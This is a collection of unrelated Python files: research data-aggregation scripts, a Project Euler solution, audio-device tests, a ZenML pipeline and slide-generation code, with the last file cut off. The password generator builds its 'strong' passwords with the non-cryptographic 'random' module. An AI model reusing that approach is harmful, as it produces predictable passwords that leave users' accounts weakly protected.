content
stringlengths 5
1.05M
|
|---|
'''
Script: aggMaxFit.py
For each run, grab the maximum fitness organism at end of run.
'''
import argparse, os, copy, errno, csv, re, sys
import hjson, json
csv.field_size_limit(sys.maxsize)
key_settings = [
"SEED",
"matchbin_metric",
"matchbin_thresh",
"matchbin_regulator",
"TAG_LEN",
"NUM_SIGNAL_RESPONSES",
"NUM_ENV_CYCLES",
"USE_FUNC_REGULATION",
"USE_GLOBAL_MEMORY",
"MUT_RATE__INST_ARG_SUB",
"MUT_RATE__INST_SUB",
"MUT_RATE__INST_INS",
"MUT_RATE__INST_DEL",
"MUT_RATE__SEQ_SLIP",
"MUT_RATE__FUNC_DUP",
"MUT_RATE__FUNC_DEL",
"MUT_RATE__INST_TAG_BF",
"MUT_RATE__FUNC_TAG_BF",
"CPU_TIME_PER_ENV_CYCLE",
"MAX_FUNC_CNT",
"MAX_FUNC_INST_CNT",
"MAX_ACTIVE_THREAD_CNT",
"MAX_THREAD_CAPACITY",
"TOURNAMENT_SIZE",
"INST_MIN_ARG_VAL",
"INST_MAX_ARG_VAL"
]
"""
This is functionally equivalent to the mkdir -p [fname] bash command
"""
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
"""
Given the path to a run's config file, extract the run's settings.
"""
def extract_settings(run_config_path):
content = None
with open(run_config_path, "r") as fp:
content = fp.read().strip().split("\n")
header = content[0].split(",")
header_lu = {header[i].strip():i for i in range(0, len(header))}
content = content[1:]
configs = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
return {param[header_lu["parameter"]]:param[header_lu["value"]] for param in configs}
def find_org_analysis_path(run_path, update):
output_path = os.path.join(run_path, "output")
# Find all org analysis files (analysis_org_0_update_1000.csv)
analysis_files = [fname for fname in os.listdir(output_path) if "analysis_org_" in fname]
def max_key(s):
u = int(s.split("_update_")[-1].split(".")[0])
if update == None:
return u
else:
return u if u <= update else -1
return os.path.join(output_path, max(analysis_files, key=max_key))
def find_trace_path(run_path, update):
output_path = os.path.join(run_path, "output")
trace_files = [fname for fname in os.listdir(output_path) if "trace_org_" in fname]
def max_key(s):
u = int(s.split("_update_")[-1].split(".")[0])
if update == None:
return u
else:
return u if u <= update else -1
return os.path.join(output_path, max(trace_files, key=max_key))
"""
Aggregate!
"""
def main():
# Setup the commandline argument parser
parser = argparse.ArgumentParser(description="Data aggregation script.")
parser.add_argument("--data", type=str, nargs="+", help="Where should we pull data (one or more locations)?")
parser.add_argument("--dump", type=str, help="Where to dump this?", default=".")
parser.add_argument("--update", type=int, default=-1, help="What is the maximum update we should pull organisms from?")
parser.add_argument("--out_fname", type=str, help="What should we call the output file?", default="max_fit_orgs.csv")
# Extract arguments from commandline
args = parser.parse_args()
data_dirs = args.data
dump_dir = args.dump
dump_fname = args.out_fname
update = args.update
# Are all data directories for real?
if any([not os.path.exists(loc) for loc in data_dirs]):
print("Unable to locate all data directories. Able to locate:", {loc: os.path.exists(loc) for loc in data_dirs})
exit(-1)
mkdir_p(dump_dir)
# Aggregate a list of all runs
run_dirs = [os.path.join(data_dir, run_dir) for data_dir in data_dirs for run_dir in os.listdir(data_dir) if "RUN_" in run_dir]
# sort run directories by seed to make easier on the eyes
run_dirs.sort(key=lambda x : int(x.split("_")[-1]))
print(f"Found {len(run_dirs)} run directories.")
analysis_header_set = set() # Use this to guarantee all organism file headers match.
# For each run, aggregate max fitness organism information.
analysis_org_infos = []
for run in run_dirs:
print(f"Extracting information from {run}")
run_config_path = os.path.join(run, "output", "run_config.csv")
# these find functions will crash
org_analysis_path = find_org_analysis_path(run, update if update >= 0 else None)
org_trace_path = find_trace_path(run, update if update >= 0 else None)
if not os.path.exists(run_config_path):
print(f"Failed to find run parameters ({run_config_path})")
exit(-1)
# double check that analysis and trace files are from the same update and org ID
analysis_update = org_analysis_path.split("/")[-1].split("_update_")[-1].split(".")[0]
trace_update = org_trace_path.split("/")[-1].split("_update_")[-1].split(".")[0]
if analysis_update != trace_update:
print(f"Analysis file and trace file updates do not match: \n * {analysis_update}\n * {trace_update}\n")
exit(-1)
analysis_id = org_analysis_path.split("/")[-1].strip("analysis_org_").split()
trace_id = org_trace_path.split("/")[-1].strip("trace_org_").split()
if analysis_id != trace_id:
print(f"Analysis file and trace file updates do not match: \n * {analysis_id}\n * {trace_id}\n")
exit(-1)
# extract run settings
run_settings = extract_settings(run_config_path)
# ========= extract analysis file info =========
content = None
with open(org_analysis_path, "r") as fp:
content = fp.read().strip().split("\n")
analysis_header = content[0].split(",")
analysis_header_lu = {analysis_header[i].strip():i for i in range(0, len(analysis_header))}
content = content[1:]
orgs = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
org = orgs[-1]
# -- collect extra fields --
base_score = float(org[analysis_header_lu["score"]])
ko_reg_score = float(org[analysis_header_lu["score_ko_regulation"]])
ko_gmem_score = float(org[analysis_header_lu["score_ko_global_memory"]])
ko_all_score = float(org[analysis_header_lu["score_ko_all"]])
ko_up_reg_score = float(org[analysis_header_lu["score_ko_up_reg"]])
ko_down_reg_score = float(org[analysis_header_lu["score_ko_down_reg"]])
use_regulation = int(ko_reg_score < base_score)
use_global_memory = int(ko_gmem_score < base_score)
use_either = int(ko_all_score < base_score)
use_up_reg = int(ko_up_reg_score < base_score)
use_down_reg = int(ko_down_reg_score < base_score)
ko_reg_delta = base_score - ko_reg_score
ko_global_mem_delta = base_score - ko_gmem_score
ko_all_delta = base_score - ko_all_score
ko_up_reg_delta = base_score - ko_up_reg_score
ko_down_reg_delta = base_score - ko_down_reg_score
extra_fields = ["relies_on_regulation", "relies_on_global_memory", "relies_on_either",
"relies_on_up_reg", "relies_on_down_reg",
"ko_regulation_delta", "ko_global_memory_delta", "ko_all_delta",
"ko_up_reg_delta", "ko_down_reg_delta"]
trace_fields = ["call_promoted_cnt", "call_repressed_cnt"]
extra_values = [use_regulation, use_global_memory, use_either,
use_up_reg, use_down_reg,
ko_reg_delta, ko_global_mem_delta, ko_all_delta,
ko_up_reg_delta, ko_down_reg_delta]
analysis_header_set.add(",".join([key for key in key_settings] + extra_fields + trace_fields + analysis_header))
if len(analysis_header_set) > 1:
print(f"Header mismatch! ({org_analysis_path})")
exit(-1)
# surround things in quotes that need it
org[analysis_header_lu["program"]] = "\"" + org[analysis_header_lu["program"]] + "\""
num_modules = int(org[analysis_header_lu["num_modules"]])
# ========= extract org trace information =========
content = None
with open(org_trace_path, "r") as fp:
content = fp.read().strip().split("\n")
trace_header = content[0].split(",")
trace_header_lu = {trace_header[i].strip():i for i in range(0, len(trace_header))}
content = content[1:]
steps = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
time_steps = [i for i in range(len(steps))]
# We want to work with the thread state info as a python dict, so..
# - raw string ==[hjson]==> OrderedDict ==[json]==> python dict
thread_states = [step[trace_header_lu["thread_state_info"]].replace(",", ",\n") for step in steps]
thread_states = [list(json.loads(json.dumps(hjson.loads(state)))) for state in thread_states]
if len(set([len(thread_states), len(time_steps), len(steps)])) != 1:
print("Trace steps do not match among components.")
exit(-1)
# From thread states, collect lists: currently_running,
# currently_active = [] # For each time step, which modules are currently active?
# currently_running = []
num_env_cycles = int(run_settings["NUM_ENV_CYCLES"])
modules_run_in_env_cycle = [set() for i in range(num_env_cycles)]
match_delta_in_env_cycle = [[0 for i in range(num_modules)] for i in range(num_env_cycles)]
module_triggered_by_env_cycle = [None for i in range(num_env_cycles)]
module_response_by_env_cycle = [set() for i in range(num_env_cycles)]
modules_active_ever = set()
modules_present_by_step = [[0 for m in range(0, num_modules)] for i in range(0, len(steps))]
modules_active_by_step = [[0 for m in range(0, num_modules)] for i in range(0, len(steps))]
modules_triggered_by_step = [None for i in range(0, len(steps))]
modules_responded_by_step = [None for i in range(0, len(steps))]
# Figure out which module responded to each environment signal.
for i in range(0, len(steps)):
step_info = {trace_header[j]: steps[i][j] for j in range(0, len(steps[i])) }
cur_response_module_id = int(step_info["cur_responding_function"])
cur_env_update = int(step_info["env_cycle"])
if cur_response_module_id != -1:
module_response_by_env_cycle[cur_env_update].add(cur_response_module_id)
modules_responded_by_step[i] = cur_response_module_id
if any([len(e) > 1 for e in module_response_by_env_cycle]):
print("something bad")
exit(-1)
cur_env = int(steps[0][trace_header_lu["env_cycle"]])
baseline_match_scores = list(map(float, steps[0][trace_header_lu["env_signal_match_scores"]].strip("[]").split(",")))
module_triggered_by_env_cycle[0] = steps[0][trace_header_lu["env_signal_closest_match"]]
modules_triggered_by_step[0] = steps[0][trace_header_lu["env_signal_closest_match"]]
for i in range(0, len(steps)):
# print(f"==== step {i} ====")
step_info = steps[i]
threads = thread_states[i]
# Extract current env cycle
env_cycle = int(step_info[trace_header_lu["env_cycle"]])
# If we're in a new env cycle, update the regulation delta for the
if env_cycle != cur_env:
cur_match_scores = list(map(float, step_info[trace_header_lu["env_signal_match_scores"]].strip("[]").split(",")))
match_delta_in_env_cycle[cur_env] = [cur - baseline for baseline, cur in zip(baseline_match_scores, cur_match_scores)]
# update baseline/current environment
baseline_match_scores = cur_match_scores
cur_env = env_cycle
module_triggered_by_env_cycle[env_cycle] = step_info[trace_header_lu["env_signal_closest_match"]]
modules_triggered_by_step[i] = step_info[trace_header_lu["env_signal_closest_match"]]
# Extract what modules are running
# print("# Threads = ", len(threads))
# print(threads)
active_modules = []
present_modules = []
if modules_triggered_by_step[i] != None:
active_modules.append(int(modules_triggered_by_step[i]))
present_modules.append(int(modules_triggered_by_step[i]))
if modules_responded_by_step[i] != None:
active_modules.append(int(modules_responded_by_step[i]))
present_modules.append(int(modules_responded_by_step[i]))
for thread in threads:
call_stack = thread["call_stack"]
# an active module is at the top of the flow stack on the top of the call stack
active_module = None
if len(call_stack):
if len(call_stack[-1]["flow_stack"]):
active_module = call_stack[-1]["flow_stack"][-1]["mp"]
if active_module != None:
active_modules.append(int(active_module))
modules_active_ever.add(int(active_module))
# add ALL modules
present_modules += list({flow["mp"] for call in call_stack for flow in call["flow_stack"]})
# add present modules to env set for this env
for module_id in present_modules: modules_run_in_env_cycle[env_cycle].add(int(module_id))
# Add active modules for this step
for module_id in active_modules: modules_active_by_step[i][module_id] += 1
# Add present modules for this step
for module_id in present_modules: modules_present_by_step[i][module_id] += 1
######### NEW ###########
final_match_scores = list(map(float, steps[-1][trace_header_lu["env_signal_match_scores"]].strip("[]").split(",")))
match_delta_in_env_cycle[cur_env] = [final - baseline for baseline, final in zip(baseline_match_scores, final_match_scores)]
######### NEW ###########
# ========= build regulation trace out file for this run =========
# - There's one trace output file per run
# - Extra fields:
# - module_id
# - time_step
# - currently_running/in the call stack
# - match_score__mid_[:]
# - regulator_state__mid_[:]
trace_out_name = f"trace-reg_update-{update}_run-id-" + run_settings["SEED"] + ".csv"
orig_fields = ["env_cycle","cpu_step","num_env_states","cur_env_state","cur_response","has_correct_response","num_modules","env_signal_closest_match","num_active_threads"]
derived_fields = ["module_id", "time_step", "is_in_call_stack", "is_running", "is_cur_responding_function", "is_match", "is_ever_active", "match_score", "regulator_state"]
trace_header = ",".join(orig_fields + derived_fields)
trace_out_lines = []
expected_lines = num_modules * len(steps)
# For each time step, for each module => add line to file
for step_i in range(0, len(steps)):
step_info = steps[step_i]
orig_component = [step_info[trace_header_lu[field]] for field in orig_fields]
time_step = time_steps[step_i]
cur_match = int(step_info[trace_header_lu["env_signal_closest_match"]])
cur_match_scores = list(map(float, step_info[trace_header_lu["env_signal_match_scores"]].strip("[]").split(",")))
cur_reg_states = list(map(float, step_info[trace_header_lu["module_regulator_states"]].strip("[]").split(",")))
cur_responding_function = int(step_info[trace_header_lu["cur_responding_function"]])
modules_present = modules_present_by_step[step_i]
modules_active = modules_active_by_step[step_i]
for module_id in range(0, num_modules):
derived_vals = [module_id, # module_id
time_step, # time_step
modules_present[module_id], # is_in_call_stack
modules_active[module_id], # is_running
int(cur_responding_function == module_id), # is_cur_responding_function
int(cur_match == module_id), # is_match
int(module_id in modules_active_ever), # is_ever_active
cur_match_scores[module_id], # match_score
cur_reg_states[module_id] # regulator_state
]
trace_out_lines.append(",".join(map(str, orig_component + derived_vals)))
if expected_lines != len(trace_out_lines):
print("AAAAAHHHHH!")
exit(-1)
with open(os.path.join(dump_dir, trace_out_name), "w") as fp:
fp.write("\n".join([trace_header] + trace_out_lines))
print(" Wrote out:", os.path.join(dump_dir, trace_out_name))
trace_out_lines = None
# ========= build execution trace out file for this run =========
exec_trace_out_name = f"trace-exec_update-{update}_run-id-" + run_settings["SEED"] + ".csv"
exec_trace_orig_fields = ["env_cycle","cpu_step","num_env_states","cur_env_state","cur_response","has_correct_response","num_modules","num_active_threads"]
exec_trace_fields = exec_trace_orig_fields + ["time_step", "active_instructions"]
exec_trace_out_lines = [",".join(exec_trace_fields)]
for step_i in range(0, len(steps)):
step_info = steps[step_i]
line_info = {field:step_info[trace_header_lu[field]] for field in exec_trace_orig_fields}
line_info["time_step"] = step_i
line_info["active_instructions"] = f'"{step_info[trace_header_lu["executed_instructions"]]}"'
exec_trace_out_lines.append(",".join([str(line_info[field]) for field in exec_trace_fields]))
with open(os.path.join(dump_dir, exec_trace_out_name), "w") as fp:
fp.write("\n".join( exec_trace_out_lines ))
#################################################################################
# Regulation graph
env_cycle_graph_out_name = f"reg-graph_update-{update}_run-id-" + run_settings["SEED"] + ".csv"
env_cycle_graph_fields = ["state_id", "env_cycle", "time_step", "module_triggered", "module_responded", "active_modules", "promoted", "repressed", "match_scores" , "match_deltas", "reg_deltas"]
lines = [",".join(env_cycle_graph_fields)]
# == build env cycle reg graph ==
state_i = None
prev_env_cycle = None
prev_active_modules = None
prev_match_scores = None
prev_reg_state = None
found_first_module = False
calls_with_repressors = 0
calls_with_promotors = 0
for step_i in range(0, len(steps)):
step_info = steps[step_i]
# Extract current env cycle
env_cycle = int(step_info[trace_header_lu["env_cycle"]])
# Extract active modules (top of call stacks)
active_modules = {i for i in range(0, num_modules) if modules_active_by_step[step_i][i] > 0}
match_scores = list(map(float, step_info[trace_header_lu["env_signal_match_scores"]].strip("[]").split(",")))
reg_state = list(map(float, step_info[trace_header_lu["module_regulator_states"]].strip("[]").split(",")))
# if this is the first time step, setup 'previous' state
if step_i == 0:
state_i = 0
prev_env_cycle = env_cycle
prev_active_modules = active_modules
prev_match_scores = match_scores
prev_reg_state = reg_state
if not found_first_module:
prev_active_modules = active_modules
found_first_module = len(active_modules) > 0
# Has anything been repressed/promoted?
match_deltas = [match_scores[i] - prev_match_scores[i] for i in range(0, num_modules)]
reg_deltas = [reg_state[i] - prev_reg_state[i] for i in range(0, num_modules)]
promoted_modules = { i for i in range(0, num_modules) if reg_state[i] < prev_reg_state[i] }
repressed_modules = { i for i in range(0, num_modules) if reg_state[i] > prev_reg_state[i] }
# if current active modules or current env cycle don't match previous, output what happened since last time we output
if (( active_modules != prev_active_modules and len(active_modules) != 0 )
or (step_i == (len(steps) - 1))
or (len(promoted_modules) != 0)
or (len(repressed_modules) != 0)):
calls_with_repressors += len(repressed_modules)
calls_with_promotors += len(promoted_modules)
promoted_str = "\"" + str(list(promoted_modules)).replace(" ", "") + "\""
repressed_str = "\"" + str(list(repressed_modules)).replace(" ", "") + "\""
deltas = "\"" + str(match_deltas).replace(" ", "") + "\"" # deltas from beginning => end of state
scores = "\"" + str(match_scores).replace(" ", "") + "\"" # match scores at end of state
reg_deltas_str = "\"" + str(reg_deltas).replace(" ", "") + "\""
active_modules_str = "\"" + str(list(prev_active_modules)).replace(" ", "") + "\"" # active modules _during_ this state
module_triggered = module_triggered_by_env_cycle[prev_env_cycle] # module triggered for this environment cycle
module_responded = -1 if len(module_response_by_env_cycle[prev_env_cycle]) == 0 else list(module_response_by_env_cycle[prev_env_cycle])[0]
lines.append(",".join([str(state_i), str(prev_env_cycle), str(step_i), str(module_triggered), str(module_responded), active_modules_str, promoted_str, repressed_str, scores, deltas, reg_deltas_str]))
prev_match_scores = match_scores
prev_active_modules = active_modules
prev_env_cycle = env_cycle
prev_reg_state = reg_state
state_i += 1
with open(os.path.join(dump_dir, env_cycle_graph_out_name), "w") as fp:
fp.write("\n".join(lines))
print(" Wrote out:", os.path.join(dump_dir, env_cycle_graph_out_name))
trace_values = [str(calls_with_promotors), str(calls_with_repressors)]
# append csv line (as a list) for analysis orgs
analysis_org_infos.append([run_settings[key] for key in key_settings] + extra_values + trace_values + org)
# Output analysis org infos
out_content = list(analysis_header_set)[0] + "\n" # Should be guaranteed to be length 1!
out_content += "\n".join([",".join(map(str, line)) for line in analysis_org_infos])
with open(os.path.join(dump_dir, dump_fname), "w") as fp:
fp.write(out_content)
print(f"Done! Output written to {os.path.join(dump_dir, dump_fname)}")
if __name__ == "__main__":
main()
|
import math
count = 0
for i in range(1, 1000000):
r = {}
while True:
r[i] = True
sum1 = 0
for j in str(i):
sum1 += math.factorial(int(j))
i=sum1
try:
if r[i]:
if len(r)==60:
count += 1
break
except:
pass
print(count) # 402
"""
I could speed this up by adding a memory of each chain...
"""
|
import json
json_data=open("data/testdata.txt").read()
data = json.loads(json_data)
print(data)
|
"""
"""
import random
class CreatePassword:
"""
"""
def __init__(self, length):
self._length = length
def generate_pwd(self, lower_case=None, upper_case=None, special=None, numbers=None):
"""
:param lower_case:
:param upper_case:
:param special:
:param numbers:
:return:
"""
characters = list()
if lower_case:
characters.extend('abcdefghijklmnopqrstuvwxyz')
if upper_case:
characters.extend('ABCDEFGHIJKLMNOPQRSTUVWXYZ')
if special:
characters.extend('!@#$%^&*()_')
if numbers:
characters.extend('1234567890')
pwd = ''
for i in range(self._length):
pwd += random.choice(characters)
return pwd
def generate_weak_pwd(self):
return self.generate_pwd(lower_case=True)
def generate_strong_pwd(self):
return self.generate_pwd(lower_case=True, upper_case=True, numbers=True, special=True)
p = CreatePassword(9)
# print(p.generate_pwd(numbers=True, lower_case=True))
# print(p.generate_weak_pwd())
# print(p.generate_strong_pwd())
# todo: designul unei alte clase pentru pass generator folosind metodele(Upper_case, Special, Numbers, etc)
|
import sys
import soundcard
import numpy
import pytest
ones = numpy.ones(1024)
signal = numpy.concatenate([[ones], [-ones]]).T
def test_speakers():
for speaker in soundcard.all_speakers():
assert isinstance(speaker.name, str)
assert hasattr(speaker, 'id')
assert isinstance(speaker.channels, int)
assert speaker.channels > 0
def test_microphones():
for microphone in soundcard.all_microphones():
assert isinstance(microphone.name, str)
assert hasattr(microphone, 'id')
assert isinstance(microphone.channels, int)
assert microphone.channels > 0
def test_default_playback():
soundcard.default_speaker().play(signal, 44100, channels=2)
def test_default_record():
recording = soundcard.default_microphone().record(1024, 44100)
assert len(recording == 1024)
def test_default_blockless_record():
recording = soundcard.default_microphone().record(None, 44100)
@pytest.fixture
def loopback_speaker():
import sys
if sys.platform == 'win32':
# must install https://www.vb-audio.com/Cable/index.htm
return soundcard.get_speaker('Cable')
elif sys.platform == 'darwin':
# must install soundflower
return soundcard.get_speaker('Soundflower64')
elif sys.platform == 'linux':
# pacmd load-module module-null-sink channels=6 rate=48000
return soundcard.get_speaker('Null')
else:
raise RuntimeError('Unknown platform {}'.format(sys.platform))
@pytest.fixture
def loopback_player(loopback_speaker):
with loopback_speaker.player(48000, channels=2, blocksize=512) as player:
yield player
@pytest.fixture
def loopback_microphone():
if sys.platform == 'win32':
# must install https://www.vb-audio.com/Cable/index.htm
return soundcard.get_microphone('Cable')
elif sys.platform == 'darwin':
# must install soundflower
return soundcard.get_microphone('Soundflower64')
elif sys.platform == 'linux':
return soundcard.get_microphone('Null', include_loopback=True)
else:
raise RuntimeError('Unknown platform {}'.format(sys.platform))
@pytest.fixture
def loopback_recorder(loopback_microphone):
with loopback_microphone.recorder(48000, channels=2, blocksize=512) as recorder:
yield recorder
def test_loopback_playback(loopback_player, loopback_recorder):
loopback_player.play(signal)
recording = loopback_recorder.record(1024*10)
assert recording.shape[1] == 2
left, right = recording.T
assert left.mean() > 0
assert right.mean() < 0
assert (left > 0.5).sum() == len(signal)
assert (right < -0.5).sum() == len(signal)
def test_loopback_reverse_recorder_channelmap(loopback_player, loopback_microphone):
with loopback_microphone.recorder(48000, channels=[1, 0], blocksize=512) as loopback_recorder:
loopback_player.play(signal)
recording = loopback_recorder.record(1024*12)
assert recording.shape[1] == 2
left, right = recording.T
assert right.mean() > 0
assert left.mean() < 0
assert (right > 0.5).sum() == len(signal)
assert (left < -0.5).sum() == len(signal)
def test_loopback_reverse_player_channelmap(loopback_speaker, loopback_recorder):
with loopback_speaker.player(48000, channels=[1, 0], blocksize=512) as loopback_player:
loopback_player.play(signal)
recording = loopback_recorder.record(1024*12)
assert recording.shape[1] == 2
left, right = recording.T
assert right.mean() > 0
assert left.mean() < 0
assert (right > 0.5).sum() == len(signal)
assert (left < -0.5).sum() == len(signal)
def test_loopback_mono_player_channelmap(loopback_speaker, loopback_recorder):
with loopback_speaker.player(48000, channels=[0], blocksize=512) as loopback_player:
loopback_player.play(signal[:,0])
recording = loopback_recorder.record(1024*12)
assert recording.shape[1] == 2
left, right = recording.T
assert left.mean() > 0
if sys.platform == 'linux':
# unmapped channels on linux are filled with the mean of other channels
assert right.mean() < left.mean()
else:
assert abs(right.mean()) < 0.01 # something like zero
assert (left > 0.5).sum() == len(signal)
def test_loopback_mono_recorder_channelmap(loopback_player, loopback_microphone):
with loopback_microphone.recorder(48000, channels=[0], blocksize=512) as loopback_recorder:
loopback_player.play(signal)
recording = loopback_recorder.record(1024*12)
assert len(recording.shape) == 1 or recording.shape[1] == 1
assert recording.mean() > 0
assert (recording > 0.5).sum() == len(signal)
def test_loopback_multichannel_channelmap(loopback_speaker, loopback_microphone):
with loopback_speaker.player(48000, channels=[2, 0], blocksize=512) as loopback_player:
with loopback_microphone.recorder(48000, channels=[2, 0], blocksize=512) as loopback_recorder:
loopback_player.play(signal)
recording = loopback_recorder.record(1024*12)
assert len(recording.shape) == 2
left, right = recording.T
assert left.mean() > 0
assert right.mean() < 0
assert (left > 0.5).sum() == len(signal)
assert (right < -0.5).sum() == len(signal)
|
"""
Licensed under the MIT License.
Copyright (c) 2021-2031. All rights reserved.
"""
import pandas as pd
import numpy as np
import os
import lightgbm as lgb
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import balanced_accuracy_score
from zenml.pipelines import pipeline
from zenml.steps import step
from zenml.steps.step_output import Output
from zenml.steps.base_step_config import BaseStepConfig
class pipeline_config(BaseStepConfig):
"""
Params used in the pipeline
"""
label: str = 'species'
@step
def split_data(config: pipeline_config) -> Output(
X=pd.DataFrame, y=pd.DataFrame
):
path_to_csv = os.path.join('~/airflow/data', 'leaf.csv')
df = pd.read_csv(path_to_csv)
label = config.label
y = df[[label]]
X = df.drop(label, axis=1)
return X, y
@step
def train_evaltor(
config: pipeline_config,
X: pd.DataFrame,
y: pd.DataFrame
) -> float:
y = y[config.label]
folds = StratifiedKFold(n_splits=5, shuffle=True, random_state=10)
lgbm = lgb.LGBMClassifier(objective='multiclass', random_state=10)
metrics_lst = []
for train_idx, val_idx in folds.split(X, y):
X_train, y_train = X.iloc[train_idx], y.iloc[train_idx]
X_val, y_val = X.iloc[val_idx], y.iloc[val_idx]
lgbm.fit(X_train, y_train)
y_pred = lgbm.predict(X_val)
cv_balanced_accuracy = balanced_accuracy_score(y_val, y_pred)
metrics_lst.append(cv_balanced_accuracy)
avg_performance = np.mean(metrics_lst)
print(f"Avg Performance: {avg_performance}")
return avg_performance
@pipeline
def super_mini_pipeline(
data_spliter,
train_evaltor
):
X, y = data_spliter()
train_evaltor(X=X, y=y)
# run the pipeline
pipeline = super_mini_pipeline(data_spliter=split_data(),
train_evaltor=train_evaltor())
DAG = pipeline.run()
|
import random
import pyexlatex as pl
import pyexlatex.table as lt
import pyexlatex.presentation as lp
import pyexlatex.graphics as lg
import pyexlatex.layouts as ll
import plbuild
from lectures.lab_exercises.notes import get_intro_to_pandas_lab_lecture, get_pandas_styling_lab_lecture, \
get_intro_python_visualization_lab_lecture
from lectures.visualization.main import get_visualization_lecture
from plbuild.paths import images_path
from pltemplates.exercises.lab_exercise import LabExercise
from pltemplates.frames.in_class_example import InClassExampleFrame
from pltemplates.frames.model_flowchart import (
ModelFlowchartFrame,
real_world_style,
model_style,
in_out_style
)
from pltemplates.blocks import LabBlock
from pltemplates.frames.tvm.project_1_lab import get_project_1_lab_frame
from models.retirement import RetirementModel
from schedule.main import LECTURE_6_NAME
pd_mono = pl.Monospace('pandas')
AUTHORS = ['Nick DeRobertis']
SHORT_TITLE = 'Visualization'
SUBTITLE = f'An Introduction to Visualization and {pd_mono}'
SHORT_AUTHOR = 'DeRobertis'
INSTITUTIONS = [
['University of Florida', 'Department of Finance, Insurance, and Real Estate'],
]
SHORT_INSTITUTION = 'UF'
DOCUMENT_CLASS = lp.Presentation
OUTPUT_LOCATION = plbuild.paths.SLIDES_BUILD_PATH
HANDOUTS_OUTPUT_LOCATION = plbuild.paths.HANDOUTS_BUILD_PATH
TITLE = LECTURE_6_NAME
ORDER = 'S6'
def get_content():
random.seed(1000)
lecture = get_visualization_lecture()
intro_pandas_lab = get_intro_to_pandas_lab_lecture().to_pyexlatex()
styling_pandas_lab = get_pandas_styling_lab_lecture().to_pyexlatex()
graphing_lab = get_intro_python_visualization_lab_lecture().to_pyexlatex()
appendix_frames = [
lecture.pyexlatex_resources_frame,
intro_pandas_lab.appendix_frames(),
styling_pandas_lab.appendix_frames(),
graphing_lab.appendix_frames()
]
ret_model = RetirementModel()
ret_df = ret_model.get_formatted_df(num_years=12)
ret_table = lt.Tabular.from_df(ret_df, extra_header=pl.Bold('Retirement Info'))
plt_mono = pl.Monospace('matplotlib')
df_mono = pl.Monospace('DataFrame')
df_basic_example = pl.Python(
"""
>>> import pandas as pd
>>> df = pd.DataFrame()
>>> df['Sales'] = [1052, 212, 346]
>>> df['Category'] = ['Aprons', 'Apples', 'Bowties']
df
"""
)
plot_example_code = pl.Python(
"""
>>> %matplotlib inline
>>> ret_df.plot.line(x='Time', y='Salaries')
"""
)
return [
pl.Section(
[
lp.DimRevealListFrame(
[
"So far we've had one main output from our model, number of years",
"Salaries and wealth over time have also been outputs, but we haven't had a good way of understanding "
"that output. It's a bunch of numbers.",
"This is where visualization comes in. We have some complex result, and want to make it easily "
"interpretable."
],
title='Why Visualize?'
),
lp.Frame(
[
pl.Center(ret_table)
],
title='What we Have so Far'
),
lp.GraphicFrame(
images_path('excel-insert-chart.png'),
title='Visualization in Excel'
),
lp.GraphicFrame(
lg.ModifiedPicture(
images_path('python-visualization-landscape.jpg'),
[
lg.Path('draw', [(0.52, 0.52), (0.85, 0.67)], options=['red'], draw_type='rectangle',
overlay=lp.Overlay([2]))
]
),
title='An Overwhelming Number of Options in Python'
),
lp.DimRevealListFrame(
[
["Ultimately, we will be creating graphs using", plt_mono, "but we won't use it directly."],
["Instead, we will use", pd_mono],
[pd_mono, "is actually creating its graphs using", plt_mono,
"for us, but it is simpler to use."]
],
title='Explaining Python Visualization in This Class'
),
InClassExampleFrame(
[
'I will now go back to the "Dynamic Salary Retirement Model.xlsx" Excel model to '
'add visualization',
'I have also uploaded the completed workbook from this exercise '
'as "Dynamic Salary Retirement Model Visualized.xlsx"',
'Follow along as I go through the example.',
],
title='Visualization in Excel',
block_title='Adding Graphs to the Dynamic Salary Retirement Excel Model'
),
],
title='Visualization Introduction',
short_title='Intro'
),
pl.Section(
[
lp.DimRevealListFrame(
[
[pd_mono, "does", pl.Bold('a lot'), 'more than just graphing. We will use it throughout the '
'rest of the class.'],
"Previously we've worked with lists, numbers, strings, and even our custom types (our model dataclasses)",
[pd_mono, "provides the", df_mono, "as a new type that we can use."],
f'Before we can get to graphing, we must learn how to use the {df_mono}.'
],
title='Some Setup Before we can Visualize in Python'
),
lp.Frame(
[
['A', df_mono, 'is essentially a table. It has rows and columns, just like in Excel.'],
pl.VFill(),
lp.Block(
[
pl.UnorderedList([
'Add or remove columns or rows',
'Group by and aggregate',
'Load in and output data from/to Excel and many other formats',
'Merge and join data sets',
'Reshape and pivot data',
'Time-series functionality',
'Slice and query your data',
'Handle duplicates and missing data'
])
],
title=f'Some Features of the {df_mono}'
)
],
title=f'What is a {df_mono}?'
),
lp.Frame(
[
df_basic_example,
pl.Graphic(images_path('df-basic-example.png'), width=0.3)
],
title=f'A Basic {df_mono} Example'
),
InClassExampleFrame(
[
'I will now go through the notebook in '
'"Intro to Pandas and Table Visualization.ipynb"',
'Follow along as I go through the example.',
'We will complete everything up until DataFrame Styling'
],
title='Introduction to Pandas',
block_title='Creating and Using Pandas DataFrames'
),
intro_pandas_lab.presentation_frames(),
lp.DimRevealListFrame(
[
['It is possible to add styling to our displayed tabular data by styling the', df_mono],
'The styling is very flexible and essentially allows you to do anything',
'Out of the box, it is easy to change colors, size, and positioning of text, add a caption, do '
'conditional formatting, and draw a bar graph over the cells.'
],
title='Styling Pandas DataFrames'
),
InClassExampleFrame(
[
'I will now go through the next section in '
'"Intro to Pandas and Table Visualization.ipynb"',
'Follow along as I go through the example.',
'This time we are covering the remainder of the notebook starting from "DataFrame Styling"'
],
title='Introduction to Pandas',
block_title='Creating and Using Pandas DataFrames'
),
styling_pandas_lab.presentation_frames(),
],
title='Tables with Pandas DataFrames',
short_title='Pandas'
),
pl.Section(
[
lp.Frame(
[
lp.Block(
[
plot_example_code,
pl.Graphic(images_path('python-salaries-line-graph.pdf'), width=0.5)
],
title=f'Line Graphs using {pd_mono}'
)
],
title='A Minimal Plotting Example'
),
lp.MultiGraphicFrame(
[
images_path('excel-salaries-line-graph.png'),
images_path('python-salaries-line-graph.pdf'),
],
vertical=False,
title='Basic Graph Types: Line Graphs'
